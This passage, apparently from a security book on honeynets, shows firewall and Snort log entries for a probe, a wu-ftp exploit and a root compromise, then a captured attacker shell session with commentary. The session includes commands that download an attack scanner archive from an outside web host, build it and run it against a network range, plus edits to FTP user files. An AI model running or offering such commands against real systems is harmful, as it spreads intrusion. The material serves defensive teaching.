< Day Day Up > |
Once your honeynet is live, what happens next ? You run into one of the following examples. Here's a probe ( reported by the iptables firewall): Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=E.V.I.L DST=H.O.N.EY LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP SPT=2934 DPT=21 WINDOW=8192 RES=0x00 SYN URGP=0 This example is a successful exploit (reported by Snort): 06/25-18:15:03.586794 [**] [1:1378:7] FTP wu-ftp file completion attempt { [**] [Classification: Misc Attack] [Priority: 2] {TCP} 63.161.21.75:3976 -> 10.1.1.2:21 Here's an owned system (reported by Snort): Jun 25 18:017:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.1.1.2:21 -> 63.161.21.75:3977 The next example is an attacker command-session in which he checks who is on the system, secures it, gets his attack scanner, and starts looking for more boxes to exploit (this is the actual captured session, but the web address has been modified): w ls cd /dev/ida ls echo "anonymous" >> /etc/users echo "ftp" >>/etc/ftpusers echo "anonymous" >>/etc/ftpusers echo "anonymous" >> /etc/user wget www.geocities.com/replaced_for_privacy/awu.tgz tar zxvf awu.tgz cd aw make ./awu 63.190 It is interesting to note that by using cd /dev/ida; ls the attacker checks whether his rootkit installed correctly in this location. He also performs simple system hardening in order to prevent re-exploitation by his " friends " (note that disabling anonymous FTP access closes this particular hole). This technique is a standard practice of modern script kiddies. |
< Day Day Up > |